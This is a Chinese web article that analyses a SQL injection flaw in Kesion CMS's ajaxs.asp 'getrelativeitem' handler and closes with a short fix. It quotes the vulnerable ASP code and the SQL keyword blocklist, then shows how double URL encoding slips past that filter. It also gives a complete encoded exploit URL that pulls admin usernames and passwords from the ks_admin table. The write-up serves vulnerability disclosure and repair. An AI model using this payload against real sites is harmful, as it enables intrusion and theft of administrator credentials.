欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Kesion cms注入漏洞分析及其修复方案

程序员文章站 2022-03-29 13:42:06
Kesion cms注入漏洞.我们来分析一下... 12-07-07...
函数过滤混乱导致注入

复制代码
代码如下:

dim ks:set ks=new publiccls
dim action
action=ks.s("action")
select case action
case "ctoe" ctoe
case "gettags" gettags
case "getrelativeitem" getrelativeitem //问题函数
...skip...
case "getonlinelist" getonlinelist
end select
sub getrelativeitem() //漏洞函数开始
dim key:key=unescape(ks.s("key"))//漏洞位置,只调用ks.s函数,无其它过滤。
dim rtitle:rtitle=lcase(ks.g("rtitle"))
dim rkey:rkey=lcase(ks.g("rkey"))
dim channelid:channelid=ks.chkclng(ks.s("channelid"))
dim id:id=ks.chkclng(ks.g("id"))
dim param,rs,sql,k,sqlstr
if key<>"" then
if (rtitle="true" or rkey="true") then
if rtitle="true" then
param=param & " title like '%" & key & "%'"//类似搜索型注入漏洞。
end if
if rkey="true" then
if param="" then
param=param & " keywords like '%" & key & "%'"
else
param=param & " or keywords like '%" & key & "%'"
end if
end if
else
param=param & " keywords like '%" & key & "%'"
end if
end if
if param<>"" then
param=" where infoid<>" & id & " and (" & param & ")"
else
param=" where infoid<>" & id
end if
if channelid<>0 then param=param & " and channelid=" & channelid
param=param & " and verific=1"
sqlstr="select top 30 channelid,infoid,title from ks_iteminfo " & param & " order by id desc" //查询
set rs=server.createobject("adodb.recordset")
rs.open sqlstr,conn,1,1
if not rs.eof then
sql=rs.getrows(-1)
end if
rs.close

 先进行了过滤,然后才调用unescape解码,
 
复制代码
代码如下:

public function s(str)
s = delsql(replace(replace(request(str), "'", ""), """", ""))
function delsql(str)
dim splitsqlstr,splitsqlarr,i
splitsqlstr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
splitsqlarr = split(splitsqlstr,"|")
for i=lbound(splitsqlarr) to ubound(splitsqlarr)
if instr(lcase(str),splitsqlarr(i))>0 then
die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & splitsqlarr(i) &";\n2、您的数据已经被记录;\n3、您的ip:"&getip&";\n4、操作日期:"&now&";\n powered by kesion.com!');window.close();</script>"
end if
next
delsql = str
end function

 如果配合unescape()函数,刚过滤不会生效。可以采用unicode编码方式,则不会在浏览器中出现被过滤的字符。例如,单引号可以编码为。%2527,经过解码后还是“'”号,这样的话,就可以利用类似php的二次编码漏洞的方式绕过过滤了。
注入语句:%') union select 1,2,username+'|'+ password from ks_admin
 转换如下:
 /plus/ajaxs.asp?action=getrelativeitem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 修复方案:
unescape()函数调用位置放在函数体内,或者不调用。